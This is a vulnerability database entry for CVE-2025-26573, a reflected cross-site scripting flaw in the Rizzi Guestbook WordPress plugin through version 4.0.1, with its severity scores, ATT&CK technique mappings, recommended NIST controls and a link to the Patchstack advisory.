CVE-2025-26573

High

Published: 26 March 2025

Published

26 March 2025

Modified

23 April 2026

KEV Added

—

Patch

—

CVSS Score 7.1 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

EPSS Score 0.0027 49.9th percentile

Risk Priority 14 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-26573 is a high-severity Cross-site Scripting (CWE-79) vulnerability. Its CVSS base score is 7.1 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique JavaScript (T1059.007); ranked at the 49.9th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Threat & Defense at a Glance

What attackers do: exploitation maps to JavaScript (T1059.007) and 3 other techniques. What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-10 Information Input Validation good match

prevent

Directly addresses improper neutralization of input by enforcing validation of guestbook user inputs to block malicious scripts.

SI-15 Information Output Filtering good match

prevent

Prevents reflected XSS by filtering and encoding information outputs generated from untrusted user inputs in web pages.

SI-2 Flaw Remediation good match

prevent

Mitigates the specific flaw in Rizzi Guestbook <=4.0.1 through timely identification, reporting, and patching of the vulnerability.

MITRE ATT&CK Enterprise TechniquesAI

T1059.007 JavaScript Execution

Adversaries may abuse various implementations of JavaScript for execution.

attack.mitre.org →

T1185 Browser Session Hijacking Collection

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.

attack.mitre.org →

T1539 Steal Web Session Cookie Credential Access

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.

attack.mitre.org →

T1550.004 Web Session Cookie Lateral Movement

Adversaries can use stolen session cookies to authenticate to web applications and services.

attack.mitre.org →

Why these techniques?

Reflected XSS allows arbitrary JavaScript execution in victim's browser, directly enabling T1059.007 (JavaScript), T1185 (Browser Session Hijacking), T1539 (Steal Web Session Cookie), and T1550.004 (Web Session Cookie) as described in the CVE impacts.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

NVD Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in JamRizzi Technologies Rizzi Guestbook rizzi-guestbook allows Reflected XSS.This issue affects Rizzi Guestbook: from n/a through <= 4.0.1.

Deeper analysisAI

CVE-2025-26573 is an Improper Neutralization of Input During Web Page Generation vulnerability, classified as Reflected Cross-site Scripting (XSS) under CWE-79, affecting the Rizzi Guestbook plugin (rizzi-guestbook) from JamRizzi Technologies. This WordPress plugin is vulnerable in all versions from n/a through 4.0.1 inclusive. The issue was published on 2025-03-26 with a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L).

Attackers can exploit this remotely over the network with low complexity and no required privileges, but it necessitates user interaction, such as clicking a malicious link. Upon successful exploitation, arbitrary JavaScript executes in the context of the targeted user's browser due to the changed scope (S:C), potentially enabling limited impacts on confidentiality, integrity, and availability, such as stealing session cookies or performing actions on behalf of the victim.

The primary advisory reference is from Patchstack, detailing the XSS vulnerability in the WordPress Rizzi Guestbook plugin up to version 4.0.1. Security practitioners should review this source for specific mitigation recommendations, including any available patches or workarounds.

Details

CWE(s): CWE-79

CVEs Like This One

CVE-2026-24836Shared CWE-79

CVE-2026-23525Shared CWE-79

CVE-2025-24629Shared CWE-79

CVE-2025-26874Shared CWE-79

CVE-2025-55289Shared CWE-79

CVE-2026-28756Shared CWE-79

CVE-2026-27196Shared CWE-79

CVE-2025-69386Shared CWE-79

CVE-2025-0828Shared CWE-79

CVE-2026-28754Shared CWE-79

References

https://patchstack.com/database/Wordpress/Plugin/rizzi-guestbook/vulnerability/wordpress-rizzi-guestbook-plugin-4-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve
audit@patchstack.com